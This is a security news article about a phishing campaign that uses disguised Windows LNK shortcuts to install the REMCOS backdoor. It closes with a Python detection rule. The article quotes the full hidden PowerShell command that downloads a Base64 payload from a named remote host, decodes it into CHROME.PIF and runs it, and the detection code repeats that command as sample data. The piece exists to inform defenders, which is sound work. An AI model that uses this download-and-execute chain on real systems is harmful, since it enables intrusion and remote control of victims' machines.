New Malware Attack Weaponizing LNK Files to Install The REMCOS Backdoor on Windows Machines

In recent weeks, cybersecurity teams have observed a surge in malicious campaigns exploiting Windows shortcut (LNK) files to deliver sophisticated backdoors.

This new wave of attacks disguises LNK shortcuts as innocuous documents or folders, relying on Windows’ default behavior of hiding known file extensions to deceive users.

Once executed, the shortcut silently invokes PowerShell with hidden window parameters, fetching and decoding a Base64 payload that ultimately installs the REMCOS backdoor.

The stealthy nature of this chain—combining social engineering, fileless scripting, and living-off-the-land binaries—underscores the evolving tactics of threat actors targeting enterprise environments.

Point Wild analysts noted that the initial delivery often arrives via phishing emails, with attachments labeled as invoices or shipping documents.

In other cases, threat actors plant these malicious shortcuts within ZIP or RAR archives on network shares, counting on casual browsing to trigger execution.

Figure: How the LNK file looks to a normal user (Source – Point Wild)

Upon double-clicking, the LNK file silently launches powershell.exe -WindowStyle hidden -Command (…), directing the victim’s machine to download an obfuscated payload from a remote server.

Point Wild researchers identified that the downloaded file masquerades with a .GIF extension but contains Base64-encoded binary data.

The campaign’s backbone is a multi-stage infection workflow. The embedded PowerShell script retrieves an encoded text resource, writes it to C:\ProgramData\HEW.GIF, decodes it into a Windows PIF file named CHROME.PIF via [System.Convert]::FromBase64String, then executes this binary.

Figure: Content of the LNK file (Source – Point Wild)

The PIF file, disguised as a Chrome-themed program, leverages legacy support for MS-DOS shortcuts to bypass modern security warnings. Once launched, it drops additional artifacts—including a scheduled task shortcut and a URL file—to ensure persistence and facilitate further payload execution.

Impact assessments reveal that the REMCOS backdoor grants attackers full remote control over compromised hosts.

REMCOS communicates over TCP with a custom binary protocol, enabling arbitrary shell command execution, file transfer, keylogging, and even webcam capture.

Victims often remain unaware of the breach, as the malware stores keystroke logs in C:\ProgramData\remcos\logs.dat and establishes encrypted channels with command-and-control servers hosted in Eastern Europe.

The combination of stealthy execution and robust remote capabilities poses a significant risk to corporate networks, where lateral movement and data exfiltration can follow initial compromise.

Infection Mechanism

The infection mechanism hinges on exploiting LNK file properties to load malicious commands. Unlike Office macros, LNK files do not trigger macro security warnings, allowing execution without user suspicion.

In this campaign, the LNK’s “Target” field is set to:

C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -Command (new-object System.Net.WebClient).DownloadFile('https://shipping-hr.ro/m/r/r.txt','C:\ProgramData\HEW.GIF'); $file="C:\ProgramData\HEW.GIF"; [System.Convert]::FromBase64String((Get-Content $file)) | Set-Content C:\ProgramData\CHROME.PIF -Encoding Byte; start C:\ProgramData\CHROME.PIF

This single-line command demonstrates the elegance of fileless attacks: it uses System.Net.WebClient to fetch the Base64 blob, then decodes and executes it entirely in memory.

The infection workflow diagram also shows how Windows displays the deceptive .lnk icon while hiding the actual payload path.

Figure: Infection Workflow (Source – Point Wild)

Attackers further obfuscate detection by embedding malware within Alternate Data Streams or crafting the icon path to point to malicious DLLs, triggering code execution when Windows attempts to render the shortcut icon.

By weaponizing LNK files, adversaries bypass many endpoint protections that focus on executable file blocks and macro detections.

The reliance on trusted system binaries, such as PowerShell and CMD, allows the REMCOS installer to evade signature-based antivirus tools.

For defenders, monitoring unusual PowerShell invocations and outbound connections to suspicious domains like shipping-hr.ro is critical.

Enhanced visibility into scheduled tasks, ADS usage, and newly created .PIF files can help identify and contain this growing threat.
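The PowerShell invocation above combines several hallmarks (hidden window, WebClient download, Base64 decode, raw bytes written with Set-Content, a .PIF launched from C:\ProgramData) that rarely occur together in legitimate administration, so a weighted command-line rule is one way to surface it. This is an added example, not a rule from the Point Wild report; the weights, threshold, tab-separated record shape and placeholder URL are all assumptions.

```python
import re

# Hallmarks of the LNK -> PowerShell -> CHROME.PIF chain. Weights are assumptions.
HALLMARKS = [
    (r"-windowstyle\s+hidden",           2, "hidden window"),
    (r"system\.net\.webclient",          2, "WebClient download"),
    (r"frombase64string",                2, "Base64 decode"),
    (r"set-content\b.*-encoding\s+byte", 2, "raw bytes written to disk"),
    (r"\.pif\b",                         3, "PIF binary referenced"),
    (r"\\programdata\\",                 1, "ProgramData staging path"),
]
THRESHOLD = 6  # assumption: three strong hallmarks together trip the rule

def score_command_line(cmdline):
    """Return (score, [matched hallmark names]) for one process command line."""
    score, hits = 0, []
    for pattern, weight, name in HALLMARKS:
        if re.search(pattern, cmdline, re.IGNORECASE):
            score += weight
            hits.append(name)
    return score, hits

def parse_event(line):
    """Split a constructed tab-separated 'key=value' process-creation record into a dict."""
    return dict(field.split("=", 1) for field in line.split("\t"))

def flag_events(lines, threshold=THRESHOLD):
    """Return [(Image, score, hits)] for records whose command line meets the threshold."""
    flagged = []
    for line in lines:
        ev = parse_event(line)
        score, hits = score_command_line(ev.get("CommandLine", ""))
        if score >= threshold:
            flagged.append((ev.get("Image", "?"), score, hits))
    return flagged

# Constructed sample records in a Sysmon-like shape; the download URL is a placeholder.
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "CommandLine=powershell.exe -WindowStyle hidden -Command (new-object System.Net.WebClient)"
    ".DownloadFile('https://example.invalid/r.txt','C:\\ProgramData\\HEW.GIF'); "
    "[System.Convert]::FromBase64String((Get-Content C:\\ProgramData\\HEW.GIF)) | "
    "Set-Content C:\\ProgramData\\CHROME.PIF -Encoding Byte; start C:\\ProgramData\\CHROME.PIF",
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "CommandLine=powershell.exe -Command Get-Process | Sort-Object CPU",
    "Image=C:\\Windows\\System32\\cmd.exe\tCommandLine=cmd.exe /c dir C:\\ProgramData",
]

if __name__ == "__main__":
    for image, score, hits in flag_events(SAMPLE_EVENTS):
        print(f"{image}: score {score}, hallmarks {hits}")
```

Because the chain stages HEW.GIF and CHROME.PIF on disk, file-creation telemetry for C:\ProgramData complements this command-line rule rather than duplicating it.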

